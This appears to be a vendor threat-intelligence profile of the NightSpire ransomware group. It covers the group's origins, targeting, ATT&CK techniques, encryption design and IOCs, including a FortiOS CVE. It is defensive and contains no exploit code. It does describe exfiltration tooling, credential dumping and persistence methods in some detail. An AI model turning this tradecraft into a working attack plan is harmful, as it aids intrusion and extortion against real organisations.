THREAT ACTOR

NightSpire

7.3
THREAT LEVEL
EMERGENCE DATE
Feb 2025
CATEGORY
Closed Group
AFFILIATIONS

Likely rebrand of Rbfs ransomware; operators xdragon128 and cuteliyuan previously affiliated with Paranodeus, CyberVolk, and DarkAssault in 2024

DEscription

First detected in early 2025, this closed group operates as a likely rebrand of Rbfs ransomware with rapid expansion affecting numerous organizations across 33 countries. The threat actor targets predominantly SMEs with ransom demands from $150,000 to $2 million, exploiting CVE-2024-55591, a critical FortiOS/FortiProxy authentication bypass as primary access vector.

CRITICALITY
Assesses the importance of the potential target, including their size/scale, data's value, and operational impact.
lethality
Evaluates the potential for damage from the attack, including the ability to disrupt operations, and cause financial loss, damage public brand image.
AGGRESSIVENESS
Assesses the psychological and tactical intensity of the group’s behavior, including targeted harassment, violent language, blackmail, and political motives.

Classifications & Affiliations

Type: Closed Group

NightSpire operates as a self-contained group with all attacks handled in-house from initial access through extortion. Maintaining total control over attacks contrasts with prevalent RaaS models. A March 2025 recruitment attempt on BreachForums seeking a negotiation specialist offering 20% profit share resulted in permanent platform ban.

Known operators xdragon128 and cuteliyuan maintain direct control, with infrastructure artifacts including hostname XDRAGON-SERVER1 linking to operator usernames. Attribution traces back to predecessor Rbfs ransomware based on shared operators, victim overlap, timeline correlation, and infrastructure continuity.

Current Status: Active operations confirmed through October 2025 with continuous victim postings.

Threat Level:
7.3

Origins and Methodology

The operation evolved from pure data extortion to comprehensive double extortion within weeks of emergence, representing one of the fastest capability transitions observed. What sets the group apart is complete reliance on legitimate tools rather than custom malware development, using MEGACmd, WinSCP, 7-Zip, PowerShell, PsExec, and WMI throughout the attack chain. Unusually, the ransomware does NOT delete Volume Shadow Copies, prioritizing encryption speed over complete recovery prevention.

Critical security failures distinguish this group from mature threat actors. Gmail usage for victim communications alongside privacy-focused services represents significant tradecraft weakness. Visible infrastructure fingerprints expose Apache, OpenSSL, and PHP versions on the leak site. Hostname XDRAGON-SERVER1 directly attributes to operator usernames, creating clear law enforcement opportunities despite rapid scaling.

What is the Evolution of NightSpire Ransomware?
0.1
Formation

First detected in early 2025 conducting data-only operations, the threat actor officially launched its Tor-based data leak site on March 12, 2025. Multiple sources confirm no activity prior to 2025, establishing this as a new emergence rather than continuation of historical operations. Initial operations focused exclusively on data theft without encryption, rapidly transitioning to full double extortion within weeks.

0.2
EVOLUTION

Initial months following emergence concentrated on establishing infrastructure including professional Tor-based leak site with countdown timers and multi-channel communication. The group transitioned from data-only extortion to encryption capabilities with AES-256 and RSA-2048 implementation within weeks. CVE-2024-55591 exploitation became the primary access vector, enabling unauthenticated attackers to gain super-admin privileges on FortiGate appliances.

Around mid-2025, expansion accelerated with geographic diversification across 33 countries spanning North America, Western Europe, Asia-Pacific, Middle East, and Africa. Development of Linux and ESXi variants detected in progress though not yet widely deployed. Current activity shows consistent attack tempo with continued victim postings through late 2025, though BreachForums recruitment ban and poor security suggest potential vulnerability to law enforcement disruption.

0.3
Lineage/Connections

The operation traces back to predecessor Rbfs ransomware group based on four critical evidence categories. Shared operators xdragon128 and cuteliyuan previously promoted Rbfs operations before emergence, with timeline analysis revealing Rbfs references ceased as operations began. Victim overlap identifies at least two leak site victims previously claimed by Rbfs, while infrastructure continuity shows through hostname XDRAGON-SERVER1 directly linking to operator username.

Historical connections place xdragon128 in 2024 affiliations with Paranodeus ransomware, CyberVolk, and DarkAssault, though precise nature of these relationships remains unclear. Tactical connections exist to Storm-1567, UNC4393, and TA2101 based on similar infrastructure and overlapping campaign tactics. Stylistic resemblance to BlackCat/ALPHV in branding and intimidation rhetoric noted, with possible inspiration from LockBit and Conti operational tactics.

Which Unique Techniques Does NightSpire Use?

The group employs opportunistic, vulnerability-driven targeting prioritizing organizations with exposed external assets and weak security posture.

TECHNIQUE

DETAILS

Infection Vectors

Primary exploitation of CVE-2024-55591 (FortiOS/FortiProxy authentication bypass) enabling unauthenticated remote attackers to gain super-admin privileges; compromised RDP credentials through brute-forcing; phishing campaigns with malicious attachments; vulnerable VPN appliances and web applications

Target Selection

Opportunistic targeting prioritizing SMEs under 1,000 employees (nearly three-quarters of victims) with vulnerable external-facing systems, unpatched FortiGate firewalls, and high-value data holdings.

Primary geographic focus on United States (over 40% of victims), Taiwan, Hong Kong, and Egypt; sector concentration in manufacturing (over a third), technology services, financial services, healthcare, and professional services

Technical Complexity

Moderate technical execution with fast-moving attacks completing data exfiltration within hours.

Windows-focused targeting with Go (Golang)-based ransomware using modular architecture; Linux and ESXi variants in development but not yet deployed

Key Features & Technical Details

The ransomware employs Go (Golang) programming language with modular architecture enabling switching between encryption routines and portable execution across Windows environments.

FEATURE

DETAILS

Encryption Method

Hybrid AES-256 for file content with RSA-2048 for key protection; dual-mode strategy employing block encryption processing large files in 1MB chunks (targeting .iso, .vhdx, .vmdk, .zip, .vib, .bak, .mdf, .ldf, .flt) with full encryption for all other file types.

Each file receives unique AES symmetric key encrypted with attacker's RSA public key appended to file tail

File Extension

.nspire appended to all encrypted files

Ransom Note

readme.txt deployed in affected directories with payment instructions

Double Extortion

Data exfiltration via MEGACmd to MEGA cloud storage, WinSCP transfers, and Rclone utility using asymmetric encrypted non-C2 protocols preceding encryption.

7-Zip compression for staging; documented exfiltration including 1.5TB from healthcare sector

Communication Channels

Tor-based leak site; email channels including ProtonMail, OnionMail, and Gmail (security weakness); Telegram channel; qTox encrypted messaging for negotiations

Deployment Speed

Encryption deployed after data staging completion; estimated dwell time under 28 days.

Block encryption optimization with 1MB chunk processing enables rapid file locking across enterprise networks

Payment Method

Bitcoin and other cryptocurrencies with specific wallet addresses undisclosed; ransom demands ranging from $150,000 to $2,000,000 based on data sensitivity and organization size

Business Model

Closed, non-affiliate group with all attacks handled in-house from initial access through extortion; no public RaaS platform.

March 2025 BreachForums recruitment attempt resulted in permanent platform ban

Activities

Attacks show low-volume but consistent patterns characterized as surgical strikes with focus on stealth and control. Between March and June 2025, the threat actor claimed responsibility for attacks on numerous organizations across 33 countries. Approximately 25 to 30 confirmed victims posted to Tor-based leak site represent non-paying subset, with many victims likely negotiating privately. Activity confirmed through late 2025 with continued steady tempo and geographic expansion.

Primary targeting concentrates on United States (over 40% of victims), with secondary focus across Asia-Pacific, Western Europe, Middle East, and Africa.

Which Industries Are Most Vulnerable to NightSpire?

Manufacturing sector experiences highest targeting (over a third), followed by technology and IT services, financial services, healthcare including hospitals, professional and business services, construction, education, retail and wholesale, hospitality, public administration including government entities, transportation and logistics, and real estate.

HAL Most Recent Attacks

Modus Operandi

The attack chain employs opportunistic exploitation of vulnerable external assets combined with extensive living-off-the-land binary abuse.

Details

Exploit Public-Facing Application (T1190) through primary exploitation of CVE-2024-55591 targeting FortiOS and FortiProxy authentication bypass in Node.js WebSocket module, enabling unauthenticated remote attackers to gain super-admin privileges via crafted requests to FortiGate firewall administrative interfaces.

Valid Accounts (T1078) using compromised RDP credentials obtained through brute-forcing and credential stuffing.

Phishing (T1566) campaigns deploying malicious attachments and drive-by downloads from compromised websites disguised as browser or security software updates. Additional vectors include exploitation of vulnerable VPN appliances, misconfigured web applications, and unpatched edge devices.

Details

Network Service Discovery (T1046) via Advanced IP Scanner deployment for network mapping and identification of additional targets. File and Directory Discovery (T1083) using Everything.exe legitimate Voidtools application abused for comprehensive file enumeration.

System Information Discovery (T1082) conducting reconnaissance of system configurations, architecture, and security postures. Process Discovery identifying running services, security tools, and backup solutions.

Details

Go-based loaders deployed via phishing and exploitation executing from temporary directories with renamed processes. Legitimate remote access utilities including AnyDesk and similar tools potentially abused for persistent access. PowerShell scripts and batch files functioning as primary execution mechanisms. PsExec serving dual purpose as lateral movement tool and remote command execution utility.

Details

Masquerading (T1036) through renamed processes executing from temporary directories. System Binary Proxy Execution (T1218) via extensive living-off-the-land binary abuse including PowerShell, PsExec, WMI, and cmd.exe blending malicious activity with legitimate system operations.

Obfuscated Files or Information (T1027) employing custom obfuscation routines hindering detection and sandbox analysis.

Indicator Removal (T1070) through selective cleanup operations, notably the group does NOT delete Volume Shadow Copies, suggesting prioritization of encryption speed over complete recovery prevention.

Details

OS Credential Dumping (T1003.001) via Mimikatz deployment for LSASS memory credential extraction and domain-level privilege escalation. Unsecured Credentials (T1552) through harvesting of stored credentials, cached authentication data, and credential files from compromised systems. Brute Force attacks targeting RDP services and administrative accounts with weak or default credentials.

Details

Application Layer Protocol (T1071) using Tor-based communication channels for anonymity. Encrypted Channel (T1573) implementing asymmetric encrypted non-C2 protocols to evade intrusion detection systems. Multi-platform coordination via email (ProtonMail, OnionMail, Gmail), Telegram channel, and qTox encrypted messaging.

Details

Remote Desktop Protocol (T1021.001) pivoting for host-to-host movement across compromised networks. SMB/Windows Admin Shares (T1021.002) via PsExec as primary lateral movement tool executing commands remotely via administrative shares. Windows Management Instrumentation (T1047) for remote command execution and lateral propagation. PowerShell remoting enabling script execution across multiple systems simultaneously.

Details

Exfiltration to Cloud Storage (T1567.002) as primary method via MEGACmd to MEGA cloud storage for large-volume data theft. Exfiltration Over Alternative Protocol (T1048) using WinSCP transfers and Rclone utility for staged data exfiltration. Exfiltration Over C2 Channel (T1041) through encrypted TOR-proxied transfers.

Archive via Utility (T1560.001) employing 7-Zip for data compression and staging prior to exfiltration, with documented exfiltration volumes including 1.5TB from healthcare sector.

Details

Registry Run Keys (T1547.001) through modifications to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run and RunOnce for payload execution on system restart. Scheduled Task/Job (T1053) creating Windows Task Scheduler entries for maintaining persistent access. Image File Execution Options registry manipulation for execution behavior control. Service creation and modification for long-term access maintenance.

Details

System disruption through comprehensive file encryption across networks. Data loss preventing access to critical business files, databases, and backups. Business interruption requiring emergency incident response, forensic investigation, and recovery processes.

Details

Data Encrypted for Impact (T1486) implementing hybrid AES-256 with RSA-2048 encryption scheme. Block encryption processes large files (.iso, .vhdx, .vmdk, .zip, .vib, .bak, .mdf, .flt, .ldf) in 1MB chunks using main_EncryptFilev2 function for performance optimization. Full encryption via main_EncryptFilev1 applies to documents and smaller files. Each file receives unique AES symmetric key encrypted with attacker's RSA public key appended to file tail.

Post-encryption files receive .nspire extension with readme.txt ransom notes placed in affected directories.

Details

Dual-threat double extortion model combining system encryption with data publication threats. Aggressive pressure tactics including payment deadlines as short as 2 days from ransom note delivery, countdown timers on leak site (3 to 90 days depending on victim), and direct emails to employees pressuring organizations. Public shaming via Tor-based leak site featuring victim database with breach dates and data sizes, free download links for some leaked data, and threatening language.

Multi-channel intimidation through Telegram channels, publication of negotiation transcript excerpts for non-compliant victims, and threats to sell data to third parties if ransoms remain unpaid.

Details

Selective indicator removal and log manipulation. Extended sleep intervals between encryption operations to evade real-time detection. Temporary file cleanup and process termination following payload execution.

Indicators of Compromise (IOCs)

Technical indicators enable detection and response capabilities across multiple layers including file hashes, network infrastructure, host-based artifacts, and behavioral patterns.

INDICATOR

DETAILS

File Hashes

SHA256: 35cefe4bc4a98ad73dda4444c700aac9f749efde8f9de6a643a57a5b605bd4e7 (primary ransomware payload)
SHA256: e275b8a02bf23b565bdaabadb220b39409eddc6b8253eb04e0f092d697e3b53d (v7.exe payload)
MD5: 0170601e27117e9639851a969240b959
SHA1: 7a4aee1910b84c6715c465277229740dfc73fa39

IP Addresses

14.139.185.60 (C2 infrastructure and WinSCP remote server operations)

Domains/URLs

nspireyzmvapgiwgtuoznlafqvlyz7ey6himtgn5bdvdcowfyto3yryd[.]onion (primary Tor-based data leak site)
a2lyiiaq4n74tlgz4fk3ft4akolapfrzk772dk24iq32cznjsmzpanqd[.]onion (secondary Tor-based data leak site)
nightspireteam.receiver@onionmail.org (email communication)
contact@nightspire-ransomware.com (email communication)
support@nightspire-team.onionmail.org (email communication)
nightspireteam.receiver@gmail.com (email communication)

File Paths

C:\Windows\Temp\ (payload execution from temporary directories)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run (registry persistence)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce (registry persistence)

File Extensions

.nspire (appended to encrypted files)
readme.txt (ransom note filename)

Exploits and Vulnerabilities

EXPLOITS AND VULNERABILITIES

CVE

CVSS

DESCRIPTION

FortiOS/FortiProxy Authentication Bypass

CVE-2024-55591

9.6-9.8

Authentication bypass in Node.js WebSocket module allowing unauthenticated remote attackers to gain super-admin privileges via crafted requests to FortiGate firewall administrative interfaces.

Additional Attack Vectors:VPN credential brute-forcing with MFA fatigue, RMM platform abuse through MSP compromise, AnyDesk for persistent access, third-party remote access appliance exploitation.